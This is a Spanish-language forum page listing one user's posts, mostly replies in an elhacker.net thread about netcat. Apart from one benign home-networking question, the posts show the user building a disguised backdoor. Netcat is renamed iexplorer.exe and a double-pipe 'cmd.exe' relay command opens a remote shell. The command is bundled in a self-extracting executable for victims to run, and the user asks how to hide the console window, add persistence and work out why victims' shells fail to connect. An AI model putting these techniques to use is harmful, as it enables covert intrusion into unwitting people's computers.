elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: [1]
1  Comunicaciones / Redes / No se ven equipos con el repetidor Wifi en: 26 Agosto 2014, 17:48 pm
Buenas, soy ravla, nuevo en estos lares.

Tengo una pequeña red domestica con la que me gustaria poder compartir archivos y impresoras, pero hay un pequeño inconveniente y es que hay un equipo que no esta en el mismo "enrutador". aunque sea todo la misma red no hay manera que se vean.

pongo una imagen, que seguro que se explica mejor que yo:



No he creado una red domestica, tal como windows7 permite, sino un grupo de trabajo con el mismo nombre en los 3 equipos. asi no hay problemas de compatibilidad con el equipo WinXP.

Si el Equipo servidor lo conecto tambien al repetidor wifi no hay problema alguno, todos los equipos se ven y se comunican perfectamente, pero a la que lo conecto al router via LAN, deja de ser visible por los otros equipos y este tampoco ve a los demas.

Alguna pista por donde debo tirar?
Muchas gracias
2  Seguridad Informática / Hacking / Re: Jugando con netcat en: 12 Abril 2007, 23:42 pm
muy currado, gracias crack!
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 12 Abril 2007, 21:16 pm
no vas a poner el SC?
4  Seguridad Informática / Hacking / Re: Jugando con netcat en: 12 Abril 2007, 16:18 pm
bueno, muchas gracias cracka, no tenia npi de esto.
ah, un dato esto de "|" se le llama tubería, hehehe, nada de simbolitos xD

otro temita, se podria ir enumerando las posibles causas que pueden hacer que aunque la victima ejecutase el ejecutable, nosotros no recibieramos la shell. porque de momento he tenido clientes que no he recibido respuesta.

y por ultimo, la manera de como ahora se inicia cada vez que se arranca no me gusta mucho ya que hay sistemas que no se conectan a internet hasta al cabo de unos segundos, ya sea porque usan wifi, o cualquier cosa, se podria pensar otra manera.


ACT: Va ser que tu metodo.... no rula, bueno, he cambiado todo eso por:

Citar
cmd.exe /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

pero sigue abriendose una ventana de shell, aunque ahora ya no sale el comando... en este caso no importaria mucho si no fuese que cuando se cierra la shell, ya no tira...
5  Seguridad Informática / Hacking / Re: Jugando con netcat en: 11 Abril 2007, 23:09 pm
ah! me olvidado decir que haciendo un .bat no me soluciona, ya que entonces si que funciona el invento pero se abre una ventana de shell con todo el comando.... y como que queda un poco feo =P
6  Seguridad Informática / Hacking / Re: Jugando con netcat en: 11 Abril 2007, 18:31 pm
buenas señoras, haciendo uso del metodo de ne0x estoy intentando crear el ejecutable con el winzip pero ... solo me ejecuta el primer comando, a ver si me explico, al poner:

Citar
iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

en "ejecutar despues de extraer", solo me ejecuta el:

Citar
iexplorer -d 127.0.0.1 21

entonces.... creo recordar que en linux lo que hacia era crear un archivo adjunto donde poner los argumentos que en este caso seria:

Citar
-d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

e invocarlo asi:

Citar
iexplorer.exe < archivoadjunto

pero no se si es fallo mio o que en la shell de win no se hace asi. alguna idea?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines